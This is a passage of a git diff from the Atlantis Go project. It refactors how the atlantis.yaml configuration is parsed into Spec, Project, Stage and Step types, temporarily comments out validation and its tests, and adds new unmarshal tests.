Equals(t, c.exp, a) }) diff --git a/server/events/yaml/config.go b/server/events/yaml/config.go deleted file mode 100644 index cd8c4f26eb..0000000000 --- a/server/events/yaml/config.go +++ /dev/null @@ -1,7 +0,0 @@ -package yaml - -type Config struct { - Version int `yaml:"version"` - Projects []Project `yaml:"projects"` - Workflows map[string]Workflow `yaml:"workflows"` -} diff --git a/server/events/yaml/config_test.go b/server/events/yaml/config_test.go deleted file mode 100644 index df4bc9c541..0000000000 --- a/server/events/yaml/config_test.go +++ /dev/null @@ -1,74 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Config - }{ - { - description: "should be empty if nothing set", - input: `~`, - exp: yaml.Config{ - Version: 0, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "should use values if set", - input: ` -version: 2 -projects: -- dir: mydir - workspace: myworkspace - workflow: default -workflows: - default: - plan: - steps: [] - apply: - steps: []`, - exp: yaml.Config{ - Version: 2, - Projects: []yaml.Project{ - { - Dir: "mydir", - Workflow: "default", - Workspace: "myworkspace", - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{"**/*.tf"}, - Enabled: true, - }, - }, - }, - Workflows: map[string]yaml.Workflow{ - "default": { - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, - }, - }, - }, - }, - } - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var conf yaml.Config - err := yamlv2.Unmarshal([]byte(c.input), &conf) - Ok(t, err) - Equals(t, c.exp, conf) - }) - } -} diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go index 8612015043..f824737404 100644 --- a/server/events/yaml/parser_validator.go +++ b/server/events/yaml/parser_validator.go @@ -1,7 +1,6 @@ package yaml import ( - "fmt" "io/ioutil" "os" "path/filepath" @@ -18,50 +17,50 @@ type ParserValidator struct{} // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. // If there was no config file, then this can be detected by checking the type // of error: os.IsNotExist(error). -func (r *ParserValidator) ReadConfig(repoDir string) (Config, error) { +func (r *ParserValidator) ReadConfig(repoDir string) (Spec, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) // NOTE: the error we return here must also be os.IsNotExist since that's // what our callers use to detect a missing config file. if err != nil && os.IsNotExist(err) { - return Config{}, err + return Spec{}, err } // If it exists but we couldn't read it return an error. if err != nil { - return Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + return Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) } // If the config file exists, parse it. config, err := r.parseAndValidate(configData) if err != nil { - return Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + return Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } return config, err } -func (r *ParserValidator) parseAndValidate(configData []byte) (Config, error) { - var repoConfig Config +func (r *ParserValidator) parseAndValidate(configData []byte) (Spec, error) { + var repoConfig Spec if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { return repoConfig, err } // Validate version. - if repoConfig.Version != 2 { - // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. - return repoConfig, errors.New("unknown version: must have \"version: 2\" set") - } - - // Validate projects. - if len(repoConfig.Projects) == 0 { - return repoConfig, errors.New("'projects' key must exist and contain at least one element") - } - - for i, project := range repoConfig.Projects { - if project.Dir == "" { - return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) - } - } + //if repoConfig.Version != 2 { + // // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. + // return repoConfig, errors.New("unknown version: must have \"version: 2\" set") + //} + // + //// Validate projects. + //if len(repoConfig.Projects) == 0 { + // return repoConfig, errors.New("'projects' key must exist and contain at least one element") + //} + // + //for i, project := range repoConfig.Projects { + // if project.Dir == "" { + // return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) + // } + //} return repoConfig, nil } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 4adc8ca34d..3081970892 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -1,508 +1,498 @@ package yaml_test -import ( - "io/ioutil" - "os" - "path/filepath" - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" -) - -func TestReadConfig_DirDoesNotExist(t *testing.T) { - r := yaml.ParserValidator{} - _, err := r.ReadConfig("/not/exist") - Assert(t, os.IsNotExist(err), "exp nil ptr") -} - -func TestReadConfig_FileDoesNotExist(t *testing.T) { - tmpDir, cleanup := TempDir(t) - defer cleanup() - - r := yaml.ParserValidator{} - _, err := r.ReadConfig(tmpDir) - Assert(t, os.IsNotExist(err), "exp nil ptr") -} - -func TestReadConfig_BadPermissions(t *testing.T) { - tmpDir, cleanup := TempDir(t) - defer cleanup() - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) - Ok(t, err) - - r := yaml.ParserValidator{} - _, err = r.ReadConfig(tmpDir) - ErrContains(t, "unable to read atlantis.yaml file: ", err) -} - -func TestReadConfig_UnmarshalErrors(t *testing.T) { - // We only have a few cases here because we assume the YAML library to be - // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. - cases := []struct { - description string - input string - expErr string - }{ - { - "random characters", - "slkjds", - "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Config", - }, - { - "just a colon", - ":", - "parsing atlantis.yaml: yaml: did not find expected key", - }, - } - - tmpDir, cleanup := TempDir(t) - defer cleanup() - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) - Ok(t, err) - r := yaml.ParserValidator{} - _, err = r.ReadConfig(tmpDir) - ErrEquals(t, c.expErr, err) - }) - } -} - -func TestReadConfig_Invalid(t *testing.T) { - cases := []struct { - description string - input string - expErr string - }{ - // Invalid version. - { - description: "no version", - input: ` -projects: -- dir: "." -`, - expErr: "unknown version: must have \"version: 2\" set", - }, - { - description: "unsupported version", - input: ` -version: 0 -projects: -- dir: "." -`, - expErr: "unknown version: must have \"version: 2\" set", - }, - { - description: "empty version", - input: ` -version: ~ -projects: -- dir: "." -`, - expErr: "unknown version: must have \"version: 2\" set", - }, - - // No projects specified. - { - description: "no projects key", - input: `version: 2`, - expErr: "'projects' key must exist and contain at least one element", - }, - { - description: "empty projects list", - input: ` -version: 2 -projects:`, - expErr: "'projects' key must exist and contain at least one element", - }, - - // Project must have dir set. - { - description: "project with no config", - input: ` -version: 2 -projects: --`, - expErr: "project at index 0 invalid: dir key must be set and non-empty", - }, - { - description: "project without dir set", - input: ` -version: 2 -projects: -- workspace: "staging"`, - expErr: "project at index 0 invalid: dir key must be set and non-empty", - }, - { - description: "project with dir set to empty string", - input: ` -version: 2 -projects: -- dir: ""`, - expErr: "project at index 0 invalid: dir key must be set and non-empty", - }, - { - description: "project with no config at index 1", - input: ` -version: 2 -projects: -- dir: "." --`, - expErr: "project at index 1 invalid: dir key must be set and non-empty", - }, - { - description: "project with unknown key", - input: ` -version: 2 -projects: -- unknown: value`, - expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", - }, - } - - tmpDir, cleanup := TempDir(t) - defer cleanup() - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) - Ok(t, err) - - r := yaml.ParserValidator{} - _, err = r.ReadConfig(tmpDir) - ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) - }) - } -} - -func TestReadConfig_Successes(t *testing.T) { - basicProjects := []yaml.Project{ - { - AutoPlan: &yaml.AutoPlan{ - Enabled: true, - WhenModified: []string{"**/*.tf"}, - }, - Workspace: "default", - TerraformVersion: "", - ApplyRequirements: nil, - Workflow: "", - Dir: ".", - }, - } - - cases := []struct { - description string - input string - expOutput yaml.Config - }{ - { - description: "uses project defaults", - input: ` -version: 2 -projects: -- dir: "."`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "autoplan is enabled by default", - input: ` -version: 2 -projects: -- dir: "." - auto_plan: - when_modified: ["**/*.tf"] -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "if workflows not defined, there are none", - input: ` -version: 2 -projects: -- dir: "." -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "if workflows key set but with no workflows there are none", - input: ` -version: 2 -projects: -- dir: "." -workflows: ~ -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "if a workflow is defined but set to null we use the defaults", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: ~ -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "if a plan or apply has no steps defined then we use the defaults", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - apply: -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "if a plan or apply explicitly defines an empty steps key then there are no steps", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - apply: - steps: -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: nil, - }, - Apply: &yaml.Stage{ - Steps: nil, - }, - }, - }, - }, - }, - { - description: "if steps are set then we parse them properly", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init - - plan - apply: - steps: - - plan # we don't validate if they make sense - - apply -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "plan", - }, - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "we parse extra_args for the steps", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init: - extra_args: [] - - plan: - extra_args: - - arg1 - - arg2 - apply: - steps: - - plan: - extra_args: [a, b] - - apply: - extra_args: ["a", "b"] -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - ExtraArgs: []string{}, - }, - { - StepType: "plan", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "plan", - ExtraArgs: []string{"a", "b"}, - }, - { - StepType: "apply", - ExtraArgs: []string{"a", "b"}, - }, - }, - }, - }, - }, - }, - }, - { - description: "custom steps are parsed", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - run: "echo \"plan hi\"" - apply: - steps: - - run: echo apply "arg 2" -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "run", - Run: []string{"echo", "plan hi"}, - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "run", - Run: []string{"echo", "apply", "arg 2"}, - }, - }, - }, - }, - }, - }, - }, - } - - tmpDir, cleanup := TempDir(t) - defer cleanup() - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) - Ok(t, err) - - r := yaml.ParserValidator{} - act, err := r.ReadConfig(tmpDir) - Ok(t, err) - Equals(t, c.expOutput, act) - }) - } -} +//func TestReadConfig_DirDoesNotExist(t *testing.T) { +// r := yaml.ParserValidator{} +// _, err := r.ReadConfig("/not/exist") +// Assert(t, os.IsNotExist(err), "exp nil ptr") +//} +// +//func TestReadConfig_FileDoesNotExist(t *testing.T) { +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// r := yaml.ParserValidator{} +// _, err := r.ReadConfig(tmpDir) +// Assert(t, os.IsNotExist(err), "exp nil ptr") +//} +// +//func TestReadConfig_BadPermissions(t *testing.T) { +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) +// Ok(t, err) +// +// r := yaml.ParserValidator{} +// _, err = r.ReadConfig(tmpDir) +// ErrContains(t, "unable to read atlantis.yaml file: ", err) +//} +// +//func TestReadConfig_UnmarshalErrors(t *testing.T) { +// // We only have a few cases here because we assume the YAML library to be +// // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. +// cases := []struct { +// description string +// input string +// expErr string +// }{ +// { +// "random characters", +// "slkjds", +// "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Spec", +// }, +// { +// "just a colon", +// ":", +// "parsing atlantis.yaml: yaml: did not find expected key", +// }, +// } +// +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// for _, c := range cases { +// t.Run(c.description, func(t *testing.T) { +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) +// Ok(t, err) +// r := yaml.ParserValidator{} +// _, err = r.ReadConfig(tmpDir) +// ErrEquals(t, c.expErr, err) +// }) +// } +//} +// +//func TestReadConfig_Invalid(t *testing.T) { +// cases := []struct { +// description string +// input string +// expErr string +// }{ +// // Invalid version. +// { +// description: "no version", +// input: ` +//projects: +//- dir: "." +//`, +// expErr: "unknown version: must have \"version: 2\" set", +// }, +// { +// description: "unsupported version", +// input: ` +//version: 0 +//projects: +//- dir: "." +//`, +// expErr: "unknown version: must have \"version: 2\" set", +// }, +// { +// description: "empty version", +// input: ` +//version: ~ +//projects: +//- dir: "." +//`, +// expErr: "unknown version: must have \"version: 2\" set", +// }, +// +// // No projects specified. +// { +// description: "no projects key", +// input: `version: 2`, +// expErr: "'projects' key must exist and contain at least one element", +// }, +// { +// description: "empty projects list", +// input: ` +//version: 2 +//projects:`, +// expErr: "'projects' key must exist and contain at least one element", +// }, +// +// // Project must have dir set. +// { +// description: "project with no config", +// input: ` +//version: 2 +//projects: +//-`, +// expErr: "project at index 0 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project without dir set", +// input: ` +//version: 2 +//projects: +//- workspace: "staging"`, +// expErr: "project at index 0 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project with dir set to empty string", +// input: ` +//version: 2 +//projects: +//- dir: ""`, +// expErr: "project at index 0 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project with no config at index 1", +// input: ` +//version: 2 +//projects: +//- dir: "." +//-`, +// expErr: "project at index 1 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project with unknown key", +// input: ` +//version: 2 +//projects: +//- unknown: value`, +// expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", +// }, +// } +// +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// for _, c := range cases { +// t.Run(c.description, func(t *testing.T) { +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) +// Ok(t, err) +// +// r := yaml.ParserValidator{} +// _, err = r.ReadConfig(tmpDir) +// ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) +// }) +// } +//} +// +//func TestReadConfig_Successes(t *testing.T) { +// basicProjects := []yaml.Project{ +// { +// AutoPlan: &yaml.AutoPlan{ +// Enabled: true, +// WhenModified: []string{"**/*.tf"}, +// }, +// Workspace: "default", +// TerraformVersion: "", +// ApplyRequirements: nil, +// Workflow: "", +// Dir: ".", +// }, +// } +// +// cases := []struct { +// description string +// input string +// expOutput yaml.Spec +// }{ +// { +// description: "uses project defaults", +// input: ` +//version: 2 +//projects: +//- dir: "."`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "autoplan is enabled by default", +// input: ` +//version: 2 +//projects: +//- dir: "." +// auto_plan: +// when_modified: ["**/*.tf"] +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "if workflows not defined, there are none", +// input: ` +//version: 2 +//projects: +//- dir: "." +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "if workflows key set but with no workflows there are none", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: ~ +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "if a workflow is defined but set to null we use the defaults", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: ~ +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// }, +// { +// StepType: "plan", +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "apply", +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "if a plan or apply has no steps defined then we use the defaults", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// apply: +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// }, +// { +// StepType: "plan", +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "apply", +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "if a plan or apply explicitly defines an empty steps key then there are no steps", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// apply: +// steps: +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: nil, +// }, +// Apply: &yaml.Stage{ +// Steps: nil, +// }, +// }, +// }, +// }, +// }, +// { +// description: "if steps are set then we parse them properly", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// - init +// - plan +// apply: +// steps: +// - plan # we don't validate if they make sense +// - apply +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// }, +// { +// StepType: "plan", +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "plan", +// }, +// { +// StepType: "apply", +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "we parse extra_args for the steps", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// - init: +// extra_args: [] +// - plan: +// extra_args: +// - arg1 +// - arg2 +// apply: +// steps: +// - plan: +// extra_args: [a, b] +// - apply: +// extra_args: ["a", "b"] +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// ExtraArgs: []string{}, +// }, +// { +// StepType: "plan", +// ExtraArgs: []string{"arg1", "arg2"}, +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "plan", +// ExtraArgs: []string{"a", "b"}, +// }, +// { +// StepType: "apply", +// ExtraArgs: []string{"a", "b"}, +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "custom steps are parsed", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// - run: "echo \"plan hi\"" +// apply: +// steps: +// - run: echo apply "arg 2" +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "run", +// Run: []string{"echo", "plan hi"}, +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "run", +// Run: []string{"echo", "apply", "arg 2"}, +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// } +// +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// for _, c := range cases { +// t.Run(c.description, func(t *testing.T) { +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) +// Ok(t, err) +// +// r := yaml.ParserValidator{} +// act, err := r.ReadConfig(tmpDir) +// Ok(t, err) +// Equals(t, c.expOutput, act) +// }) +// } +//} diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go index 7a5730665f..d6d7e89e6d 100644 --- a/server/events/yaml/project.go +++ b/server/events/yaml/project.go @@ -1,30 +1,10 @@ package yaml type Project struct { - Dir string `yaml:"dir"` - Workspace string `yaml:"workspace"` - Workflow string `yaml:"workflow"` - TerraformVersion string `yaml:"terraform_version"` - AutoPlan AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements"` -} - -const DefaultWorkspace = "default" - -func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Project - // Set up defaults. - defaults := alias{ - Workspace: DefaultWorkspace, - AutoPlan: AutoPlan{ - Enabled: true, - WhenModified: []string{"**/*.tf"}, - }, - } - if err := unmarshal(&defaults); err != nil { - return err - } - *p = Project(defaults) - return nil + Dir *string `yaml:"dir,omitempty"` + Workspace *string `yaml:"workspace,omitempty"` + Workflow *string `yaml:"workflow,omitempty"` + TerraformVersion *string `yaml:"terraform_version,omitempty"` + AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements,omitempty"` } diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go index c3ab94d1db..0827bee733 100644 --- a/server/events/yaml/project_test.go +++ b/server/events/yaml/project_test.go @@ -15,23 +15,19 @@ func TestProject_UnmarshalYAML(t *testing.T) { exp yaml.Project }{ { - description: "should use defaults", - input: ` -dir: .`, + description: "omit unset fields", + input: "", exp: yaml.Project{ - Dir: ".", - Workspace: "default", - Workflow: "", - TerraformVersion: "", - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{"**/*.tf"}, - Enabled: true, - }, + Dir: nil, + Workspace: nil, + Workflow: nil, + TerraformVersion: nil, + AutoPlan: nil, ApplyRequirements: nil, }, }, { - description: "should use all set fields", + description: "all fields set", input: ` dir: mydir workspace: workspace @@ -43,13 +39,13 @@ auto_plan: apply_requirements: - mergeable`, exp: yaml.Project{ - Dir: "mydir", - Workspace: "workspace", - Workflow: "workflow", - TerraformVersion: "v0.11.0", + Dir: String("mydir"), + Workspace: String("workspace"), + Workflow: String("workflow"), + TerraformVersion: String("v0.11.0"), AutoPlan: &yaml.AutoPlan{ WhenModified: []string{}, - Enabled: false, + Enabled: Bool(false), }, ApplyRequirements: []string{"mergeable"}, }, @@ -59,7 +55,7 @@ apply_requirements: for _, c := range cases { t.Run(c.description, func(t *testing.T) { var p yaml.Project - err := yamlv2.Unmarshal([]byte(c.input), &p) + err := yamlv2.UnmarshalStrict([]byte(c.input), &p) Ok(t, err) Equals(t, c.exp, p) }) diff --git a/server/events/yaml/spec.go b/server/events/yaml/spec.go new file mode 100644 index 0000000000..874877f766 --- /dev/null +++ b/server/events/yaml/spec.go @@ -0,0 +1,7 @@ +package yaml + +type Spec struct { + Version *int `yaml:"version,omitempty"` + Projects []Project `yaml:"projects,omitempty"` + Workflows map[string]Workflow `yaml:"workflows,omitempty"` +} diff --git a/server/events/yaml/spec_test.go b/server/events/yaml/spec_test.go new file mode 100644 index 0000000000..6106e22a27 --- /dev/null +++ b/server/events/yaml/spec_test.go @@ -0,0 +1,152 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Spec + expErr string + }{ + { + description: "no data", + input: "", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "yaml nil", + input: "~", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "invalid key", + input: "invalid: key", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct yaml.Spec", + }, + { + description: "version set", + input: "version: 2", + exp: yaml.Spec{ + Version: Int(2), + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects key without value", + input: "projects:", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "workflows key without value", + input: "workflows:", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects with a map", + input: "projects:\n key: value", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []yaml.Project", + }, + { + description: "projects with a scalar", + input: "projects: value", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []yaml.Project", + }, + { + description: "should use values if set", + input: ` +version: 2 +projects: +- dir: mydir + workspace: myworkspace + workflow: default + terraform_version: v0.11.0 + auto_plan: + enabled: false + when_modified: [] + apply_requirements: [mergeable] +workflows: + default: + plan: + steps: [] + apply: + steps: []`, + exp: yaml.Spec{ + Version: Int(2), + Projects: []yaml.Project{ + { + Dir: String("mydir"), + Workspace: String("myworkspace"), + Workflow: String("default"), + TerraformVersion: String("v0.11.0"), + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + Workflows: map[string]yaml.Workflow{ + "default": { + Apply: &yaml.Stage{ + Steps: []yaml.Step{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.Step{}, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var conf yaml.Spec + err := yamlv2.UnmarshalStrict([]byte(c.input), &conf) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, conf) + }) + } +} diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go index 7c84323b55..be342403f6 100644 --- a/server/events/yaml/stage.go +++ b/server/events/yaml/stage.go @@ -1,5 +1,5 @@ package yaml type Stage struct { - Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' + Steps []Step `yaml:"steps,omitempty"` } diff --git a/server/events/yaml/stage_test.go b/server/events/yaml/stage_test.go new file mode 100644 index 0000000000..ffcebe1a5a --- /dev/null +++ b/server/events/yaml/stage_test.go @@ -0,0 +1,47 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestStage_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Stage + }{ + { + description: "empty", + input: "", + exp: yaml.Stage{ + Steps: nil, + }, + }, + { + description: "all fields set", + input: ` +steps: [step1] +`, + exp: yaml.Stage{ + Steps: []yaml.Step{ + { + Key: String("step1"), + }, + }, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a yaml.Stage + err := yamlv2.UnmarshalStrict([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} diff --git a/server/events/yaml/step.go b/server/events/yaml/step.go new file mode 100644 index 0000000000..f8c09d9bc0 --- /dev/null +++ b/server/events/yaml/step.go @@ -0,0 +1,61 @@ +package yaml + +// Step represents a single action/command to perform. In YAML, it can be set as +// 1. A single string for a built-in command: +// - init +// - plan +// 2. A map for a built-in command and extra_args: +// - plan: +// extra_args: [-var-file=staging.tfvars] +// 3. A map for a custom run command: +// - run: my custom command +// Here we parse step in the most generic fashion possible. See fields for more +// details. +type Step struct { + // Key will be set in case #1 and #3 above to the key. In case #2, there + // could be multiple keys (since the element is a map) so we don't set Key. + Key *string + // Map will be set in case #2 above. + 